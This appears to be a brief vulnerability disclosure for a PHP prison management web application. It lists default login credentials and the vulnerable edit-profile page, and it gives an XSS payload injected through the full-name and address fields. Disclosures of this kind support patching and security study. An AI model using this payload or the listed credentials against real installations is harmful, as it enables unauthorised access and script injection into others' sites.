https://www.sourcecodester.com/sql/17287/prison-management-system.html
V1.0
PHP, Apache, MySQL
http://localhost/prison/Account/login.php
password:- escobar2012
Email :- releaseme@gmail.com
/Employee/edit-profile.php
The parameter txtfullname
and txtaddress
are being echoed directly into the HTML without proper sanitization or validation. This allows an attacker to inject arbitrary JavaScript code into the page, leading to XSS attacks.
# Employee/edit-profile.php
<input type="text" size="77" name="txtaddress" value=""><svg/onload=alert(1)>" class="form-control">
<input type="text" size="77" name="txtfullname" value=""><svg/onload=alert(1)>" class="form-control" required="">
Payload:
"><svg/onload=alert(1)>